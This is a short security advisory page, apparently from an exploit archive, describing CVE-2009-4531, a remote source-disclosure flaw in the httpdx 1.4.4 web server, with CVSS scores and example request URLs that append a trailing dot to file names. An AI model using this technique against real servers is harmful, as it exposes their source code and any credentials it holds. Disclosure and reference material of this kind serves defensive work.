httpdx 1.4.4 and prior remote source disclosure

2009.10.13

Credit: Dr_IDE

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2009-4531

CWE: CWE-200

CVSS Base Score: 5/10

Impact Subscore: 2.9/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: None

Availability impact: None

################################################
#
# httpdx <= 1.4.4 Remote Source Disclosure
# Found By: Dr_IDE
# Tested On: Windows XPSP3
# Download: httpdx.sourceforge.net/downloads/
#
################################################

- Description -

httpdx Web Server <= 1.4.4 is a Windows based HTTP server. This is the latest
version of the application available.

httpdx is vulnerable to remote arbitrary source code disclosure by the
following means.

- Technical Details -

http://[ webserver IP]/[ file ][.]

http://172.16.2.101/index.html.
http://172.16.2.101/test.py.
http://172.16.2.101/test.php.

[pocoftheday.blogspot.com]

References:

http://xforce.iss.net/xforce/xfdb/53733

http://www.osvdb.org/58857

http://secunia.com/advisories/37013

http://pocoftheday.blogspot.com/2009/10/httpdx-144-remote-arbitrary-source.html

http://packetstormsecurity.org/0910-exploits/httpdx-disclose.txt

http://freetexthost.com/eiyfyt0km5

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

httpdx 1.4.4 and prior remote source disclosure

References:

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

httpdx 1.4.4 and prior remote source disclosure

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.